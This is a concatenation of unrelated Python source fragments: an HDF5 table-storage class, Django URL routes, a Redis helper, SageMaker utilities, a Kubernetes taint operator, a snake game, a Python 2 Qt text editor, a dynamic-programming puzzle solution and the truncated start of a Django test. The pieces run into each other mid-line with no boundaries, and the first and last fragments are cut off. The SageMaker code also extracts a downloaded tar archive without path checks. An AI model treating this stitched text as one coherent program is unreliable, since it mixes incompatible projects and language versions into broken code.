len(simpah5_attrs) == 0: raise Exception(f"{table_name} doesn't exist in {self._h5file}") col_dtype = simpah5_attrs[ATTR_COLDTYPE] nrows = simpah5_attrs[ATTR_NROWS] return_cols = set(col_dtype.keys()) if col not in return_cols: raise Exception(f'Specified column {col} not in {table_name} columns {list(return_cols)}') dtype = col_dtype[col] colflavor = simpah5_attrs[ATTR_COLFLAV][col] colnode = self._get_col(h5, self._path(table_name, col)) for row in colnode.iterrows(): if dtype[0] == 's': yield row.decode('utf-8') elif dtype[0] == 'o': yield msgpack_loads(row, compress=False) elif dtype[0] == 'c': yield msgpack_loads(row, compress=True) elif flavor and flavor == 'numpy': yield row elif dtype[0] == 'f' or dtype[0] == 'n' and colflavor == 'python': yield float(row) elif dtype[0] == 'i' and colflavor == 'python': yield int(row) else: yield row def _append_ctable(self, h5, table_path: str, col_data: dict, resize: bool=True, col_dtypes: Optional[dict]=None): if col_dtypes is None: col_dtypes = {} # ensure all lengths are equal error check data_lengths = [len(d) for d in col_data.values()] last_len = data_lengths[0] for klen in data_lengths: if last_len != klen: raise Exception(f"column lengths are not equal on append: {last_len} vs {klen}") simpah5_attrs = self._read_attrs(h5, table_path) # need to create table as it does not exist if len(simpah5_attrs) == 0: if col_dtypes: # compute shapes shapes = {} for col, data in col_data.items(): sp = (0,) if isinstance(data, np.ndarray) and len(data.shape) > 1: sp = list(data.shape) sp[0] = 0 shapes[col] = sp self._create_ctable(h5, table_path, col_dtypes, shapes) simpah5_attrs = self._read_attrs(h5, table_path) else: coldt = {} for col, data in col_data.items(): dtype = self._create_column_from_data(h5, table_path, col, data) coldt[col] = dtype # write table attributes self._write_attrs(h5, table_path, ATTR_COLDTYPE, coldt) _ = self._set_flavor(h5, table_path, col_data, coldt) return coldt = simpah5_attrs[ATTR_COLDTYPE] if len(set(coldt.keys()).difference(set(col_data.keys()))) > 0: raise Exception(f"Not all columns specified in col_data for append to {table_path}. " f"dtypes={set(coldt.keys())} ... col_data={set(col_data.keys())} in {self._h5file}") # check and set the column flavor once if ATTR_COLFLAV not in simpah5_attrs: simpah5_attrs[ATTR_COLFLAV] = self._set_flavor(h5, table_path, col_data, coldt) prev_nrows = self._table_info(h5, table_path)[ATTR_NROWS] restore = False error_msg = '' for col, coldtype in coldt.items(): try: data = self._convert_data(col_data[col], coldtype) colpath = self._path(table_path, col) if re.match(r'[osc](\d+)', coldtype): colnode = self._safe_col_str_change(h5, colpath, coldtype, data, resize) else: colnode = self._get_node(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") colnode.append(data) except: restore = True error_msg = traceback.format_exc() break if restore: # loop through all column nodes and ensure they have the same previous length to restore for col, coldtype in coldt.items(): col_path = self._path(table_path, col) node = self._get_col(h5, col_path) cur_rows = int(node.shape[0]) if cur_rows > prev_nrows: inds = list(range(prev_nrows, cur_rows)) node = self._get_col(h5, col_path) self._remove_array_rows(node, inds) raise Exception(error_msg) @staticmethod def _convert_data(data: (list, tuple), coldtype: str): if re.match(r'c', coldtype): data = [msgpack_dumps(x, compress=True) for x in data] elif re.match(r'o', coldtype): data = [msgpack_dumps(x, compress=False) for x in data] data = np.array(data) if re.search(r'U', str(data.dtype)): data = np.core.defchararray.encode(data, 'utf-8') assert isinstance(data, (list, tuple, np.ndarray)) return data def _path(self, colpath: str, colname: str) -> str: return self._norm_path(colpath, colname=colname) def _get_col(self, h5: tb.File, nodepath: str) -> tb.EArray: nodepath = self._norm_path(nodepath) try: node = h5.get_node(nodepath) except KeyError: node = None return node def _get_node(self, h5: tb.File, nodepath: str) -> tb.Leaf: nodepath = self._norm_path(nodepath) try: node = h5.get_node(nodepath) except KeyError: node = None return node @staticmethod def _norm_path(colpath: str, colname: str = '') -> str: if not colpath: colpath = '/' if colpath == '/': name = [] else: name = [''] cst = 0 cend = len(colpath) if colpath[0] == '/': cst = 1 if colpath[-1] == '/': cend = cend - 1 name.append(colpath[cst:cend]) if colname: nst = 0 nend = len(colname) if colname[0] == '/': nst = 1 if colname[-1] == '/': nend = nend - 1 name.append(colname[nst:nend]) return '/'.join(name) def _exists_node(self, h5: tb.File, nodepath: str) -> tb.Leaf: nodepath = self._norm_path(nodepath) try: node = h5.get_node(nodepath) except tb.NoSuchNodeError: node = None return node def _write_attrs(self, h5, table_path, attrs_name, attrs_value): table = self._get_node(h5, table_path) try: attr_bytes = table._v_attrs[ATTR_CTABLE] simpah5_attrs = msgpack_loads(attr_bytes, use_list=True) except KeyError: simpah5_attrs = {} simpah5_attrs['_version'] = VERSION simpah5_attrs[attrs_name] = attrs_value table._v_attrs[ATTR_CTABLE] = msgpack_dumps(simpah5_attrs) def _read_attrs(self, h5, table_path: str) -> dict: try: node = self._get_node(h5, table_path) except tb.NoSuchNodeError: return {} if ATTR_CTABLE not in node._v_attrs: return {} simpah5_attrs = msgpack_loads(node._v_attrs[ATTR_CTABLE], use_list=True) return simpah5_attrs def _set_flavor(self, h5: tb.File, table_path: str, col_data: dict, col_dtypes: dict) -> dict: # set column flavors colflavor = {} for col, dtype in col_dtypes.items(): if isinstance(col_data[col], (list, tuple)): colflavor[col] = 'python' else: colflavor[col] = 'numpy' self._write_attrs(h5, table_path, ATTR_COLFLAV, colflavor) return colflavor def _create_column(self, h5: tb.File, colpath: str, atom: Optional[tb.Atom]=None, expectedrows: int=10000, shape: Optional[tuple]=None, data: (list, tuple, np.ndarray)=None) -> tb.EArray: # create an EArray column and return the created node if data is None and shape is None: shape = (0,) if data is not None and not isinstance(data, np.ndarray) and isinstance(data[0], str): data = [x.encode('utf-8') for x in data] return h5.create_earray( os.path.dirname(colpath), os.path.basename(colpath), obj=data, createparents=True, atom=atom, shape=shape, expectedrows=expectedrows, filters=self._filters ) def _create_column_from_dtype(self, h5: tb.File, table_path: str, col_name: str, col_dtype: str, shape: tuple, expectedrows: int=10000): colpath = self._path(table_path, col_name) if re.match(r'[nf]', col_dtype): self._create_column(h5, colpath, atom=tb.Float64Atom(), shape=shape, expectedrows=expectedrows) elif re.match(r'i', col_dtype): self._create_column(h5, colpath, atom=tb.Int64Atom(), shape=shape, expectedrows=expectedrows) elif re.match(r'[osc](\d+)', col_dtype): m = re.match(r'[osc](\d+)', col_dtype) size = int(m.group(1)) self._create_column(h5, colpath, atom=tb.StringAtom(size), shape=shape, expectedrows=expectedrows) else: raise Exception(f'Unrecognized col_dtype: {col_dtype}') def _create_column_from_data(self, h5: tb.File, table_path: str, col_name: str, data: (list, tuple, np.ndarray), expectedrows: int=10000) -> str: if isinstance(data[0], str): objdt = 's' elif isinstance(data[0], (list, tuple, dict, bytes)): data = [msgpack_dumps(x, compress=False) for x in data] objdt = 'o' elif not isinstance(data[0], (int, float, np.int, np.float, np.ndarray)): raise Exception(f"Unknown type in col: {col_name} type:{type(data[0])} in {self._h5file}") earray_col = self._create_column(h5, self._path(table_path, col_name), data=data, expectedrows=expectedrows) if re.match(r'[if]', str(earray_col.dtype)): m = re.match(r'([if])', str(earray_col.dtype)) dtype = m.group(1) elif re.search(r'S(\d+)', str(earray_col.dtype)): m = re.search(r'S(\d+)', str(earray_col.dtype)) dtype = f'{objdt}{m.group(1)}' else: raise Exception(f"Corruption possible: Unallowed datatype in created column " f"{table_path}/{col_name}: {str(earray_col.dtype)} in {self._h5file}") return dtype def list_nodes(self, path='/', node_type='EArray'): """ List all nodes found in path. :param path: Starting path to look for tables. :return: """ with self.open(mode='r') as h5: allnodes = [] for g in h5.walk_nodes(path, classname=node_type): # if len(g._v_groups) == 0: allnodes.append(g._v_pathname) return allnodes def delete_rows(self, table_path: str, query: Union[list, tuple]=(), rows: Optional[list]=None) -> None: """ Delete the rows in the ctable. Specified by EITHER query OR rows. If rows is specified those rows will be deleted. IMPORTANT: rows may be shuffled in the table after delete to free space, so row order will not be preserved. For query use see :meth:`.read_ctable` :param table_path: path to table. :param query: rows meeting these conditions will be deleted. :param rows: list of integers corresponding to the rows in the table that should be deleted. :return: """ if query and rows: raise Exception(f"Both query and rows specified in {self._h5file}") elif not query and not rows: raise Exception(f"Either query/match or rows MUST be specified in {self._h5file}") with self.open(mode='a') as h5: simpah5_attrs = self._read_attrs(h5, table_path) col_dtype = simpah5_attrs[ATTR_COLDTYPE] if rows: inds = rows elif query: # return a dictionary of node name to node pointers node_data = h5.get_node(self._norm_path(table_path))._v_children inds = _filter_inds(node_data, query) inds = np.nonzero(inds)[0] else: raise NotImplementedError('match not implemented yet') if len(inds) != 0: for col in col_dtype: col_path = self._path(table_path, col) node = self._get_col(h5, col_path) self._remove_array_rows(node, inds) def _remove_array_rows(self, node: tb.EArray, rm_rows: Union[list, tuple]): """ Reorganize array by re-writing(moving) the minimal number of rows in order to delete all specified rows and to truncate the array without losing data. * any rows after len(node)-len(rm_rows) must be moved since they will be truncated * only those rows after len(node)-len(rm_rows) that are to be kept must be moved ensure same rows are not overwritten :param node: h5 node :param rm_rows: list of row indicies to remove :return: """ node_len = len(node) rm_rows = np.array(sorted(set(rm_rows))) num_rm = len(rm_rows) # determine last row index (non-inclusive) that needs to be moved last_row = node_len - num_rm # compute the set of rows that are past the last row dont_worry_rows = set(rm_rows[rm_rows >= last_row]) # compute the rows that need to be moved move_rows = set(range(last_row, node_len)).difference(dont_worry_rows) move_rows = sorted(move_rows) # compute the new set of rows to replace with the move rows replace_rows = sorted(set(rm_rows[rm_rows < last_row])) if len(move_rows) != len(replace_rows): raise Exception(f'Something is wrong with the length of the move {len(move_rows)} and replace ' f'{len(replace_rows)} rows in {self._h5file}') # shift rows at the end of the file into the row to remove to minimize number of writes for i in range(len(move_rows)): node[replace_rows[i]] = node[move_rows[i]] # delete the end of the array that was moved to the removed nodes node.truncate(len(node) - num_rm) def table_info(self, table_name: str) -> dict: """ Read the table information including column datatypes and flavor. Returns empty dictionary if table doesn't exist. Info returned as keys of dictionary:: * col_dtype: dict of column data types * col_flavor: dict of column flavors * num_rows: number of rows in table :param table_name: table name :return """ with self.open(mode='r') as h5: return self._table_info(h5, table_name) def table_nrows(self, table_name: str) -> int: """ Return the number of rows in the table :param table_name: :return: """ return self.table_info(table_name).get(ATTR_NROWS, 0) def _table_info(self, h5, table_name: str) -> dict: simpah5_attrs = self._read_attrs(h5, table_name) if len(simpah5_attrs) > 0: for colname in simpah5_attrs[ATTR_COLDTYPE]: node = self._get_col(h5, self._path(table_name, colname)) simpah5_attrs[ATTR_NROWS] = int(node.shape[0]) break return simpah5_attrs def _safe_col_str_change(self, h5: tb.File, colpath: str, coldtype: str, data: (list, tuple), resize: bool): colnode = self._get_col(h5, colpath) if colnode is None: raise Exception(f"Table column doesn't exist: {colpath} in {self._h5file}") m = re.match(r'[osc](\d+)', coldtype) if not m: raise Exception(f'Col dtype for column {colpath} should be [osc] and is not: {coldtype} in {self._h5file}') size = int(m.group(1)) m = re.search(r's(\d+)', str(data.dtype).lower()) if not m: raise Exception(f'Data in column {colpath} should be similar to {coldtype} and is {data.dtype}' f' in {self._h5file}') dlen = int(m.group(1)) if dlen > size: if not resize: msg = f"Data corruption happening in {colpath}. Table may be corrupted." \ f"Serialized data len ({dlen}) > ({size + 1}) in {self._h5file}" raise Exception(msg) else: logging.warning(f"Changing column size to {dlen} and overwriting ... {colpath}") # safely rewrite data at expense of memory and time tmp_col_path = colpath + '_tmp' # create new column of desired shape newcolnode = self._create_column(h5, tmp_col_path, atom=tb.StringAtom(dlen)) # re-write all data into that column # newcolnode.append(colnode[:]) for idx, row in enumerate(colnode.iterrows()): newcolnode.append([row]) # clean up old path and point to new path h5.remove_node(colpath) colname = os.path.basename(colpath) table_path = os.path.dirname(colpath) h5.rename_node(tmp_col_path, colname) # update attributes colnode = self._get_col(h5, colpath) m = re.search(r'S(\d+)', str(colnode.dtype)) new_len = int(m.group(1)) simpah5_attrs = self._read_attrs(h5, table_path) col_dtypes = simpah5_attrs[ATTR_COLDTYPE] m = re.match(r'([os])', col_dtypes[colname]) col_dtypes[colname] = f'{m.group(1)}{new_len}' _ = self._write_attrs(h5, table_path, ATTR_COLDTYPE, col_dtypes) return colnode def repack(self) -> None: """ Re-write entire file which has the effect of recompressing data efficiently and eliminating free space. Should generally be run periodically if files are written to largely or modified. :return: """ tmp_name = self._h5file + '.' + str(uuid.uuid4()) with self.open(mode='r') as h5: h5.copy_file(tmp_name, filters=self._filters) os.remove(self._h5file) os.rename(tmp_name, self._h5file) # write repack timestamp with self.open(mode='a') as h5: data = [datetime.now().timestamp(), h5.get_filesize()] try: h5.get_node('/_last_repack')[:] = data except AttributeError: h5.create_array('/', '_last_repack', obj=data) from django.conf.urls import url from . import views from django.conf import settings from django.conf.urls.static import static from django.urls import re_path, path, include from .views import home, edit_profile, projects, signup, profile, upload, index # from django.contrib.auth import views from django.contrib.auth import views as auth_views from django_registration.backends.one_step.views import RegistrationView urlpatterns = [ url('^$', views.index, name='awwards'), url(r'^home/', views.home, name='home'), url(r'^search/', views.search_results, name='search_results'), path('profile//', profile, name='profile'), path('registration_form/', views.signup, name='signup'), path('project/', projects, name='project'), path('upload/', views.upload, name='upload'), path('profile//settings', edit_profile, name='edit_profile'), path('account/', include('django.contrib.auth.urls')), ] if settings.DEBUG: urlpatterns+= static(settings.MEDIA_URL, document_root = settings.MEDIA_ROOT)import redis def most_active_commenters(r: redis.Redis, n=10): result = sorted( (int(r.get(k)), k.decode()) for k in r.keys('comments:*') )[-n:] return list(reversed(result))awslabs/sagemaker-handwritten-text-recognitionsagemaker/src/sm_utils.py import boto3 import os import tarfile from urllib.parse import urlparse def get_cognito_configs(): ''' Helper function to get a previously defined cognito user pool. Returns None if there is no previously defined cognitor user pool Return: ------ cognito_config: {str: str} containing the client id and userpool ''' sm_client = boto3.client('sagemaker') workforces = sm_client.list_workforces() if len(workforces["Workforces"]) > 0: return workforces["Workforces"][0]["CognitoConfig"] else: return None def get_signup_domain(workteam_name): ''' Returns: ------- ''' sm_client = boto3.client('sagemaker') workteams = sm_client.list_workteams() for workteam in workteams["Workteams"]: if workteam["WorkteamName"] == workteam_name: subdomain = workteam["SubDomain"] return "https://{}/logout".format(subdomain) return None def parse_s3_url(s3_url): o = urlparse(s3_url, allow_fragments=False) return o.netloc, o.path[1:] def get_latest_training_job(name_contains): sagemaker_client = boto3.client('sagemaker') response = sagemaker_client.list_training_jobs( NameContains=name_contains, StatusEquals='Completed' ) training_jobs = response['TrainingJobSummaries'] assert len(training_jobs) > 0, "Couldn't find any completed training jobs with '{}' in name.".format(name_contains) latest_training_job = training_jobs[0]['TrainingJobName'] return latest_training_job def get_model_data(training_job): sagemaker_client = boto3.client('sagemaker') response = sagemaker_client.describe_training_job(TrainingJobName=training_job) assert 'ModelArtifacts' in response, "Couldn't find ModelArtifacts for training job." return response['ModelArtifacts']['S3ModelArtifacts'] def parse_model_data(s3_location, save_dir): s3_client = boto3.client('s3') bucket, key = parse_s3_url(s3_location) key = key.replace("model.tar.gz", "output.tar.gz") s3_client.download_file(Bucket=bucket, Key=key, Filename=os.path.basename(key)) tar = tarfile.open(os.path.basename(key)) tar.extractall(path=save_dir) tar.close()from __future__ import annotations import json import logging import kopf from kubernetes import client, config MATCH_LABELS_KEY = "matchLabels" WANTED_TAINTS_KEY = "wantedTaints" UNWANTED_TAINTS_KEY = "unwantedTaints" WANTS_TAINTS_KEY = "nodetaintmgr.k8s.lanvstn.be/wants-taints" logging.basicConfig(level=logging.DEBUG) config.load_kube_config() def load_taint(taint: dict) -> str: """taints are handled as json strings because their dict form is unhashable""" return json.dumps(dict(sorted(taint.items()))) @kopf.index("nodetaintrules.k8s.lanvstn.be") def rule_index(spec: dict, **_): return { (label_k, label_v): { WANTED_TAINTS_KEY: spec.get(WANTED_TAINTS_KEY, []), UNWANTED_TAINTS_KEY: spec.get(UNWANTED_TAINTS_KEY, []), } for label_k, label_v in spec.get(MATCH_LABELS_KEY, {"": ""}).items() } @kopf.on.resume("node") @kopf.on.create("node") @kopf.on.field("node", field="spec.taints") @kopf.on.field("node", field=("metadata", "annotations", WANTS_TAINTS_KEY)) # tuple field format because of dots in key def handle_node(name: str, spec: dict, labels: dict, rule_index: kopf.Index, **_): old_state = set([load_taint(taint) for taint in spec.get("taints", [])]) desired_state = old_state.copy() matching_rules = [ rule_resources for label, rule_resources in rule_index.items() if label in labels.items() or label == ("", "") ] for rule_resources in matching_rules: for rule in rule_resources: desired_state |= set([load_taint(taint) for taint in rule.get(WANTED_TAINTS_KEY, [])]) desired_state -= set([load_taint(taint) for taint in rule.get(UNWANTED_TAINTS_KEY, [])]) if old_state != desired_state: logging.info(f"updating taints for node: {name}") logging.info(f"new taints: {desired_state}") v1 = client.CoreV1Api() v1.patch_node(name, {"spec": {"taints": [json.loads(taint) for taint in desired_state]}}) @kopf.on.event("nodetaintrules.k8s.lanvstn.be") def handle_rule(name, namespace, spec, **_): logging.info(f"handling nodetaintule {namespace}/{name} {spec}") # Trick to force reconcile by changing an annotation field which we watch # TODO: trigger handle_node without having to resort to this v1 = client.CoreV1Api() nodes = v1.list_node().items node: client.V1Node for node in nodes: v1.patch_node( node.metadata.name, { "metadata": { "annotations": {WANTS_TAINTS_KEY: str(int(node.metadata.annotations.get(WANTS_TAINTS_KEY, 0)) + 1)} } }, ) IhebHaboubi/snake import random import pygame class Snake: def __init__(self, window, obj): self.color = obj["body_color"] self.food_color = obj["food_color"] self.size = obj["size"] self.length = obj["length"] self.window = window self.height = window.get_height() self.width = window.get_width() self.rows = self.height // self.size self.cols = self.width // self.size self.possible_x = set(i * self.size for i in range(self.cols)) self.possible_y = set(i * self.size for i in range(self.rows)) # x[0] and y[0] head of the snake self.x = [self.size * i for i in range(5 + self.length, 5, -1)] self.y = [self.size * (self.rows // 2)] * self.length # initialise direction to right self._direction = [1, 0] @property def direction(self): return self._direction @direction.setter def direction(self, value): if self._direction != [-x for x in value]: self._direction = value def draw_body(self): for i in range(self.length): rect = (self.x[i], self.y[i], self.size, self.size) pygame.draw.rect(self.window, self.color, rect) def grow(self): # increase the snake size by 1 unit self.length += 1 self.y.append(2 * self.y[-1] - self.y[-2]) self.x.append(2 * self.x[-1] - self.x[-2]) def move(self): # each part of the snake takes the previous position of the one in front of it for i in range(self.length - 1, 0, -1): self.x[i] = self.x[i - 1] self.y[i] = self.y[i - 1] self.x[0] += self.direction[0] * self.size self.y[0] += self.direction[1] * self.size @property def ate(self): return (self.x[0], self.y[0]) == self.food @property def crashed(self): # check if the snake collides with itself if (self.x[0], self.y[0]) in zip(self.x[1:], self.y[1:]): return True # check if the snake collides with the wall if not 0 <= self.x[0] < self.width: return True if not 0 <= self.y[0] < self.height: return True return False def spawn_food(self): # food cordinates should be a multiple of the snake size # and it should not appear on top of the snake x = tuple(self.possible_x - set(self.x)) y = tuple(self.possible_y - set(self.y)) self.food = random.choice(x), random.choice(y) def draw_food(self): x, y = self.food rect = (x, y, self.size, self.size) pygame.draw.rect(self.window, self.food_color, rect) import sys, string, types, time from qt import * from qtcanvas import * from kuragui.guiconfig import guiConf from kuralib import kuraapp True = 1 False = 0 from dbobj.dbexceptions import dbRecordNotFoundException class CanvasException(Exception): def __init__(self, error): Exception.__init__(self) self.error = error def __repr(self): return self.error def __str(self): return self.error class KuraIlItem(QCanvasText): def __init__(self, text, canvas): if text == None: self.__text = "" elif type(text) not in [types.StringType, types.UnicodeType]: self.__text = str(text) else: self.__text = text QCanvasText.__init__(self, QString(self.__text), canvas) self.setFont(canvas.normalfont) def move(self, p): c = self.canvas() r = self.boundingRect() x = p.x() y = p.y() if c.currentLineHeight < r.height(): c.currentLineHeight = r.height() if x + c.lineSpacing + r.width() > c.maxLineWidth: x = c.leftMargin y = y + c.lineSpacing + c.currentLineHeight c.currentLineHeight = r.height() QCanvasText.move(self, x, y) QCanvasText.show(self) return QPoint(x + r.width() + c.elementSpacing, y) def __repr__(self): r = self.boundingRect() return "%s, x %i, y %i, w %i, h %i (%s)" % \ (str(self.__class__), r.x(), r.y(), r.width(), r.height(), self.__text) class KuraIlTagItem(KuraIlItem): def __init__(self, tag, record, canvas): KuraIlItem.__init__(self, record.getTag(tag).getDescription(), canvas) self.__tag = tag self.__record = record.getTag(tag) def setText(self, text): self.__record.description = (unicode(text)) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() KuraIlItem.setText(self, text) def getRecord(self): return self.__record class KuraIlCanvasTextItem(KuraIlItem): def __init__(self, text, canvas): KuraIlItem.__init__(self, text, canvas) class KuraIlCanvasTextTagItem(KuraIlTagItem): pass class KuraIlCanvasTextTitleItem(KuraIlCanvasTextItem): def __init__(self, record, canvas): KuraIlCanvasTextItem.__init__(self, record.title, canvas) self.__record = record self.setFont(self.canvas().titlefont) def setText(self, text): self.__record.title = unicode(text) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() KuraIlCanvasTextItem.setText(self, text) def getRecord(self): return self.__record def move(self, p): QCanvasText.move(self, p.x(), p.y()) QCanvasText.show(self) r = self.boundingRect() return QPoint(self.canvas().leftMargin, r.height() + self.canvas().lineSpacing) class KuraIlCanvasTextDescriptionItem(KuraIlCanvasTextItem): def __init__(self, record, canvas): KuraIlCanvasTextItem.__init__(self, record.description, canvas) self.__record = record def getRecord(self): return self.__record def setText(self, text): self.__record.description = unicode(text) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() KuraIlCanvasTextItem.setText(self, text) def move(self, p): x = p.x() y = p.y() r = self.boundingRect() c = self.canvas() QCanvasText.move(self, c.leftMargin, y) QCanvasText.show(self) return QPoint(c.leftMargin, y + r.height() + c.lineSpacing) class KuraIlCanvasStreamItem(KuraIlItem): def __init__(self, record, canvas): KuraIlItem.__init__(self, record.seqnr, canvas) self.__record = record self.setFont(canvas.boldfont) def setText(self, text): try: i = int(str(text)) except: print "Could not convert %s to int" % unicode(text) return KuraIlItem.setText(self, str(i)) self.__record.seqnr = i if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() def getRecord(self): return self.__record def move(self, p): c = self.canvas() x = 10 y = p.y() + c.lineSpacing + c.currentLineHeight c.currentLineHeight = 0 QCanvasText.move(self, x, y) QCanvasText.show(self) return QPoint(c.leftMargin, y) class KuraIlCanvasStreamTagItem(KuraIlTagItem): def __init__(self, tag, record, canvas): KuraIlTagItem.__init__(self, tag, record, canvas) self.setFont(canvas.italicfont) self.__record = record def move(self, p): c = self.canvas() x = c.leftMargin + c.elementSpacing y = p.y() + c.currentLineHeight + c.lineSpacing c.currentLineHeight = 0 QCanvasText.move(self, x, y) QCanvasText.show(self) return QPoint(c.leftMargin, y + c.lineSpacing) class KuraIlCanvasElementItem(KuraIlItem): def __init__(self, record, canvas): KuraIlItem.__init__(self, record.text + "\n" + record.translation(), canvas) self.__record = record def setText(self, text): text = unicode(text) if text.find("\n") > 0: t = unicode(text).split("\n") elif text.find(" ") > 0: t = unicode(text).split(" ") else: t = [text] if len(t) > 1: text, tag = (t[0], " ".join(t[1:])) else: text, tag = (text, None) self.__record.text = unicode(t[0]) if self.__record.getPrimaryKey() == None: self.__record.insert() else: self.__record.update() if tag: self.__record.setGlosse(tag) else: tag = self.__record.translation(False) KuraIlItem.setText(self, text + "\n" + tag) def getRecord(self): return self.__record class KuraIlCanvasElementTagItem(KuraIlTagItem): pass class kuraIlCanvas(QCanvas): def __init__(self, parent=0, name=0 ): QCanvas.__init__(self, parent, name) self.cursor = QCanvasRectangle(self) self.scol = QCanvasLine(self) self.items = [] self.currentItem = -1 self.lineHeight=QFontMetrics(guiConf.textfont).height() self.lineSpacing=QFontMetrics(QFont(guiConf.textfont)).lineSpacing() + 5 self.lineSetSpacing = 5 self.elementSpacing = 8 self.leftMargin = 50 self.rightMargin = 20 self.topMargin = 10 self.maxLineWidth = 500 self.normalfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Normal, False) self.italicfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Normal, False) self.boldfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Bold, False) self.bolditalicfont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize(), QFont.Bold, False) self.titlefont = QFont(guiConf.textfont.family(), guiConf.textfont.pointSize() * 2, QFont.Bold, False) def redisplay(self, start = 0): self.currentLineHeight = 0 if type(start) != types.IntType: try: start = self.items.index(start) except ValueError: print "ValueError:", start, "not in items" start = 0 if start == 0: p = QPoint(self.leftMargin, self.topMargin) else: p = previousItem.boundingRect().bottomRight() for item in self.items[start:]: p = item.move(p) y = self.items[-1].y() + self.currentLineHeight + self.lineSpacing self.scol.setPoints(self.leftMargin - 5, 0, self.leftMargin - 5, y) self.scol.show() def handleStream(self, stream): item = KuraIlCanvasStreamItem(stream, self) self.items.append(item) for element in stream.getElements(): self.items.append(KuraIlCanvasElementItem(element, self)) item = KuraIlCanvasStreamTagItem("TR", stream, self) self.items.append(item) def handleText(self, text): # Title object item = KuraIlCanvasTextTitleItem(text, self) self.items.append(item) item = KuraIlCanvasTextDescriptionItem(text, self) self.items.append(item) for stream in text.getStreams(): self.handleStream(stream) def setText(self, lngText): self.lngText = lngText self.handleText(lngText) self.redisplay(0) y = self.items[-1].y() + self.currentLineHeight + self.lineSpacing self.resize(self.maxLineWidth + self.leftMargin + self.rightMargin, y + 400) self.currentItem = 0 self.setCursor() self.update() def setCursor(self, pos = None): if pos == None: try: i = self.items[self.currentItem] except IndexError: return else: try: i = self.collisions(pos)[0] if i not in self.items: raise IndexError, "Wrong one" self.currentItem = self.items.index(i) except IndexError, e: try: return self.items[self.currentItem] except: return r = i.boundingRect() self.cursor.move(r.x() -2, r.y() -2) self.cursor.setSize(r.width() + 4, r.height() + 4) self.cursor.setZ(-1.0) self.cursor.setPen(QPen(QColor(Qt.gray), 2, Qt.DashLine)) self.cursor.show() self.update() return i def getCurrentItem(self): if len(self.items) < 1: return None else: if self.currentItem < 0: return self.items[0] elif self.currentItem > len(self.items) - 1: return self.items[-1] else: return self.items[self.currentItem] def nextItem(self): self.currentItem += 1 if self.currentItem >= len(self.items): self.currentItem = len(self.items) self.setCursor() return self.getCurrentItem() def previousItem(self): self.currentItem -= 1 if self.currentItem < 0: self.currentItem = 0 self.setCursor() return self.getCurrentItem() def firstItem(self): self.currentItem = 0 self.setCursor() return self.getCurrentItem() def lastItem(self): self.currentItem = len(self.items) - 1 self.setCursor() return self.getCurrentItem() def deleteItem(self): if self.currentItem > -1 and self.currentItem < len(self.items): item = self.getCurrentItem() item.setCanvas(None) r = item.getRecord() if r.getPrimaryKey() != None: r.delete(True) del self.items[self.currentItem] self.redisplay(0) self.setCursor() return item else: return self.getCurrentItem() def setItemText(self, item, text): item.setText(text) def up(self): y = self.getCurrentItem().y() i = self.currentItem while i > 0: i -= 1 if self.items[i].y() != y: break self.currentItem = i self.setCursor() return self.getCurrentItem() def down(self): y = self.getCurrentItem().y() i = self.currentItem while i < len(self.items) - 1: i += 1 if self.items[i].y() != y: break self.currentItem = i self.setCursor() return self.getCurrentItem() def insertItem(self, item): if self.currentItem == len(self.items) - 1: self.items.append(item) else: self.items.insert(self.currentItem + 1, item) self.currentItem = self.currentItem + 1 self.renumber() self.redisplay(0) self.setCursor() def renumber(self): strm_pknr = -1 strm_seqnr = 0 elmt_seqnr = 0 for i in self.items: if i.__class__ == KuraIlCanvasStreamItem: i.setText(str(strm_seqnr)) r = i.getRecord() r.seqnr = strm_seqnr r.textnr = self.lngText.textnr if r.getPrimaryKey() == None: r.insert() strm_pknr = r.getPrimaryKey() strm_seqnr += 1 elmt_seqnr = 0 elif i.__class__ == KuraIlCanvasElementItem: r = i.getRecord() r.seqnr = elmt_seqnr r.textnr = self.lngText.textnr r.streamnr = strm_pknr if r.getPrimaryKey() == None: r.insert() elmt_seqnr += 1 def insertElement(self, record): if not self.items[self.currentItem].__class__ == KuraIlCanvasElementItem: i = self.currentItem while i >= 0: if self.items[i].__class__ == KuraIlCanvasStreamItem: break if self.items[i].__class__ == KuraIlCanvasStreamTagItem: i = -1 break i -= 1 if i == -1: raise CanvasException("NoStreamDefinedError") item = KuraIlCanvasElementItem(record, self) self.insertItem(item) return item def insertStream(self, record): item = KuraIlCanvasStreamItem(record, self) self.insertItem(item) return item __copyright__=""" copyright : (C) 2002 by see copyright notice for license email : """ __revision__="""$Revision: 1.21 $"""[11:-2] # Time: O(m * n * k * (m + n)) # Space: O(m * n * k) class Solution(object): def ways(self, pizza, k): """ :type pizza: List[str] :type k: int :rtype: int """ MOD = 10**9+7 prefix = [[0]*len(pizza[0]) for _ in range(len(pizza))] for j in reversed(range(len(pizza[0]))): accu = 0 for i in reversed(range(len(pizza))): accu += int(pizza[i][j] == 'A') prefix[i][j] = (prefix[i][j+1] if (j+1 < len(pizza[0])) else 0) + accu dp = [[[0]*k for _ in range(len(pizza[0]))] for _ in range(len(pizza))] for i in reversed(range(len(pizza))): for j in reversed(range(len(pizza[0]))): dp[i][j][0] = 1 for m in range(1, k): for n in range(i+1, len(pizza)): if prefix[i][j] == prefix[n][j]: continue if prefix[n][j] == 0: break dp[i][j][m] = (dp[i][j][m] + dp[n][j][m-1]) % MOD for n in range(j+1, len(pizza[0])): if prefix[i][j] == prefix[i][n]: continue if prefix[i][n] == 0: break dp[i][j][m] = (dp[i][j][m] + dp[i][n][m-1]) % MOD return dp[0][0][k-1] from datetime import datetime from textwrap import dedent from os.path import join, dirname from django.contrib.contenttypes.models import ContentType from django.contrib.sites.models import Site from django.conf import settings from django.test import TestCase as DjangoTestCase from django_comments_tree.models import (TreeComment, CommentAssociation, MaxThreadLevelExceededException) from django_comments_tree.tests.models import Article, Diary class ArticleBaseTestCase(DjangoTestCase): def setUp(self): self.article_1 = Article.objects.create( title="September", slug="september", body="During September...") self.article_2 = Article.objects.create( title="October", slug="october", body="What I did on 